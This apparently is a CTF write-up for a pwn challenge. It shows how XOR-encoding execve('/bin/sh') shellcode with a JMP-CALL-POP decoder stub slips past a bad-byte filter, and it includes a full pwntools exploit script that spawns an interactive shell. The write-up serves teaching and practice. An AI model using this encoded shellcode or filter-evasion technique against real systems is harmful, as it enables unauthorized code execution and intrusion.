Encode/Decode shellcode

Execute is a pwn challenge that requires us to write shellcode that bypasses the filter check.

When we decompile the execute binary, we can see that there is a check function which will compare user input to an array of bad bytes.

bad bytes:;Tbinsh\xf6\xd2\xc0_\xc9flag\x00

The bad bytes represent key parts of shell code execution, specifically the execve syscall and all its arguments. Typically, we would write the shellcode like this:

xor rax, rax ; clear out the rax register
mov rdi, 0x0068732f6e69622f ; hex of /bin/sh str
push rdi ; pushing the /bin/sh value on the stack
push rsp ; pushing the stack pointer value on the stack
pop rdi ; putting the value of the top of the stack in rdi
xor rsi, rsi ; clear out the rsi register
xor rdx, rdx ; clear out the rdx register
mov rax, 59 ; syscall number in rax
syscall ; perform execve("/bin/bash", null, null) syscall

A good way around the bad bytes filter is to encode our payload. But to do that, we will also need a decoder, otherwise we will execute garbage.

What is shellcode

Shellcode is code which can be executed by a program in the attempt to exploit a vulnerability in it, usually to get a shell (/bin/sh).

Why are we writing shellcode

In the below screenshot, notice that the program performs check() on our input, and if we pass the check then it will execute our buf array (thanks to the (&buf)() function pointer).

Stack is executable.

We can execute the shellcode we will push on the stack in buf.

At main+174 we can see the call instruction that calls rdx, which contains our shellcode.

Encoding & Decoding shellcode

To decode our encoded shellcode, we can use a technique called JMP-CALL-POP. This will allow us to send a big set of instructions that will start with the decoder handling our encoded payload, and decoding it byte by byte.

More information can be found on Ray Doyle’s blogpost https://www.doInyler.net/security-not-included/hello-world-shellcode.

JMP-CALL-POP

The idea is to start executing a jump to our call_decoder function, which will then call the decoder function. The reason why we jump is because we want to avoid nulls. This blogpost explains it well https://marcosvalle.github.io/osce/2018/05/06/JMP-CALL-POP-technique.html.

In assembly, when you perform the call instruction, it will push the return address on the stack (i.e the next instruction), then sets RIP (instruction pointer) to the called target.

RSP is the stack pointer, so it will always point to the top of the stack. What we have at the top of the stack now is the address of our actual shellcode (because in our exploit code, it will come right after the call instruction).

When we POP RSI, we pop the value at the top of the stack and copy it into RSI register. So it copies RSP into RSI.

Our call pushes the return address (the address of the next instruction bab99) on the stack.

The top of the stack (RSP) points to bab99, and we POP that address in the RSI register.

Then, we can save a copy of that address into RDI. The reason why we do that is because when we decode our shellcode, we will be incrementing the RSI pointer (since we decode byte by byte). Saving the start address allows us to easily jump back to that address to execute our decoded shellcode.

The decoding is done directly in memory, that’s why we can jump back to the start of the actual shellcode to execute it.

The decoder shellcode

deobfs_shellcode = asm(f"""
jmp  call_decoder 

decoder:
pop rsi ; this will add the address of our shellcode into the rsi register.
mov rdi, rsi ; making a copy to jmp back later.
; using cl and al registers to avoid null bytes (8 bit registers).
mov cl, {payload_len} ; size for loop counter
mov al, 0x0d ; the number 13 in decimal 

decode_loop:
xor byte ptr [rsi], al ; xor one byte at a time
add rsi, 0x1 ; increase ptr
loop decode_loop ; keep looping until cl is 0
jmp rdi ; jmp to saved start of shellcode

call_decoder:
call decoder 
""")

The encoded shellcode

I xor’ed my shellcode with the value 13 (nothing crazy I picked it randomly after doing one or two checks to verify that my encoded shellcode didn’t contain any bad characters). So now we have an encoded shellcode which is really just garbage.

actual_shellcode = asm("""
xor rax, rax ; null the rax register
mov rdi, 0x0068732f6e69622f ; /bin/sh string in rdi
push rdi ; pushing the value on the stack
push rsp ; then we push the stack pointer addr on the stack
pop rdi ; save the stack ptr addr in the rdi register so now we have a ptr to the /bin/sh string
xor rsi, rsi ; null the rsi regiser 
xor rdx, rdx ; null the rdx register
mov rax, 59 ; syscall number for execve
syscall ; perform syscall with correct values in registers
""")

for num in range(0, len(actual_shellcode)):
safe.append(actual_shellcode[num] ^ 13) //xor'ing the shellcode

With pwntools you can assemble the code using asm(“””[your ASM code]”””)

Ok so now we have our decoder that will decode our encoded payload. This way, we bypass the bad bytes filter and we can still execute a syscall with execve, and get a shell !! Success

Together, it will look like this in the python script

shellcode = deobfs_shellcode + bytes(safe)
p.sendline(shellcode)
p.interactive()

from pwn import *

IP, PORT = "IP", PORT
elf = ELF("./execute", checksec=False)
#libc = ELF("./libc.so.6", checksec=False)
context.binary = elf
# context.log_level = "debug"
context.terminal = ["kitty", "-e"]

gs = """
"""

def conn():
    if args.REMOTE:
        r = remote(IP, PORT)
    elif args.LOCAL:
        r = process([elf.path])
    elif args.GDB:
        r = gdb.debug([elf.path], gdbscript=gs)
    else:
        r = process([elf.path], level="WARNING")
    return r

with conn() as p:
    
    black_list = b";Tbinsh\xf6\xd2\xc0_\xc9flag\x00"

    actual_shellcode = asm("""
    xor rax, rax 
    mov rdi, 0x0068732f6e69622f
    push rdi
    push rsp
    pop rdi
    xor rsi, rsi
    xor rdx, rdx
    mov rax, 59
    syscall
    """)
    
    safe = []
   
    # Check for bad bytes 
    for num in range(0, len(actual_shellcode)):
        safe.append(actual_shellcode[num] ^ 13)
    for i in range(0, len(black_list)):
        for j in range(0, len(safe)):
            if black_list[i] == safe[j]:
                print("Wrong instruction: " + hex(safe[j]))
                print(chr(safe[j]))
            else:
                pass
 
    payload_len = len(safe)
  
    # in x86-64, loop uses the RCX register. CL is the 8-bit of RCX and we can use that register because we are only using one byte to loop. AL is the lowest 8 bits of the RAX register, 

    deobfs_shellcode = asm(f"""
jmp  call_decoder

decoder:
pop rsi
mov rdi, rsi
mov cl, {payload_len}
mov al, 0x0d

decode_loop:
xor byte ptr [rsi], al
add rsi, 0x1
loop decode_loop
jmp rdi

call_decoder:
call decoder
""")    
    
    shellcode = deobfs_shellcode + bytes(safe)
    p.sendline(shellcode)

    p.interactive()